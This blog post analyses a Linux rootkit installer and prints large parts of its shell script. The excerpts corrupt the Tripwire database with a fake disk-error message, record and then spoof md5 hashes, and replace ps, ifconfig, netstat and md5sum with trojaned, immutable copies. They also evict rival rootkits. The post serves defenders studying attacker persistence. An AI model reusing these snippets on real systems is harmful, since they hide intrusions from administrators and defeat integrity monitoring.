echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}" uname=`uname -n` twd=/var/lib/tripwire/$uname.twd if [ -d /etc/tripwire ]; then echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}" if [ -f /var/lib/tripwire/$uname.twd ]; then chattr -isa $twd echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}" echo "${RED} ALERT! tripwire database found ${RES}" echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}" echo "-----------------------------------------" > $twd echo "Tripwire segment-faulted !" >> $twd echo "-----------------------------------------" >> $twd echo "" >> $twd echo "The reasons for this may be: " >> $twd echo "" >> $twd echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd echo "corrupted files while checking for possible change etc." >> $twd echo "" echo "pls. rerun tripwire to build the database again!" >> $twd echo "" >> $twd else echo "${WHI} lucky you: Tripwire database not found. ${RES}" fi else echo "${WHI} guess not. ${RES}" fi
For those not familiar with it, Tripwire is designed to monitor system files for unauthorized tampering.
The above code, in all its simplistic glory, effectively negates any protection offered by Tripwire. It does so by simply corrupting the Tripwire database, and making the administrator think it was due to a disk error.
The same malware setup later on records the MD5 hash of certain key system files prior to installing the malware.
# Say hello to md5sum fixer boys n gurls ! if [ -f /sbin/ifconfig ]; then /usr/bin/md5sum /sbin/ifconfig >> .shmd5 fi if [ -f /bin/ps ]; then /usr/bin/md5sum /bin/ps >> .shmd5 fi if [ -f /bin/ls ]; then /usr/bin/md5sum /bin/ls >> .shmd5 fi if [ -f /bin/netstat ]; then /usr/bin/md5sum /bin/netstat >> .shmd5 fi if [ -f /usr/bin/find ]; then /usr/bin/md5sum /usr/bin/find >> .shmd5 fi if [ -f /usr/bin/top ]; then /usr/bin/md5sum /usr/bin/top >> .shmd5 fi if [ -f /usr/sbin/lsof ]; then /usr/bin/md5sum /usr/sbin/lsof >> .shmd5 fi if [ -f /usr/bin/slocate ]; then /usr/bin/md5sum /usr/bin/slocate >> .shmd5 fi if [ -f /usr/bin/dir ]; then /usr/bin/md5sum /usr/bin/dir >> .shmd5 fi if [ -f /usr/bin/md5sum ]; then /usr/bin/md5sum /usr/bin/md5sum >> .shmd5 fi
The setup then continues to backup current system files and replace them with malware-infected copies:
The md5 tool is even replaced with a custom copy, designed to return the original hash values recorded earlier:
# Backdoor ps/top/du/ls/netstat/etc.. cd $BASEDIR/bin BACKUP=/usr/lib/libsh/.backup mkdir $BACKUP # ps ... if [ -f /usr/bin/ps ]; then chattr -isa /usr/bin/ps cp /usr/bin/ps $BACKUP mv -f ps /usr/bin/ps chattr +isa /usr/bin/ps fi if [ -f /bin/ps ]; then chattr -isa /bin/ps cp /bin/ps $BACKUP mv -f ps /bin/ps chattr +isa /bin/ps fi # ifconfig ... chattr -isa /sbin/ifconfig cp /sbin/ifconfig $BACKUP mv -f ifconfig /sbin/ifconfig chattr +isa /sbin/ifconfig # netstat ... if [ -f /usr/sbin/netstat ]; then chattr -isa /usr/sbin/netstat mv -f netstat /usr/sbin/netstat chattr +isa /usr/sbin/netstat fi
# md5sum ... chattr -isa /usr/bin/md5sum cp /usr/bin/md5sum $BACKUP mv -f md5sum /usr/bin/md5sum chattr +isa /usr/bin/md5sum
Now that the attacker has a silent foothold on the system, the setup script proceeds to check for potentially vulnerable services, as well as even check for other rootkits:
# CHECKING FOR HOSTILE ROOTKITS/BACKDORS |
mkdir $HOMEDIR/.owned |
if [ -f /etc/ttyhash ]; then |
chattr -AacdisSu /etc/ttyhash |
rm -rf /etc/ttyhash |
fi |
if [ -d /lib/ldd.so ]; then |
chattr -isa /lib/ldd.so |
chattr -isa /lib/ldd.so/* |
mv /lib/ldd.so $HOMEDIR/.owned/tk8 |
echo "${RED}[${WHI}sh${RED}]# tk8 detected and owned ...!!!! ${RES}" |
fi |
if [ -d /usr/src/.puta ]; then |
chattr -isa /usr/src/.puta |
chattr -isa /usr/src/.puta/* |
mv /usr/src/.puta $HOMEDIR/.owned/tk7 |
echo "${RED}[${WHI}sh${RED}]# tk7 detected and owned ...!!!! ${RES}" |
fi |
Make no mistake - today's attackers are smart. They will do whatever they can to keep a foothold on compromised systems, including blocking access by other attackers.
If you're interested in seeing more, you can view the full setup script at the CaffSec Malware Analysis Google Code site.
No comments:
Post a Comment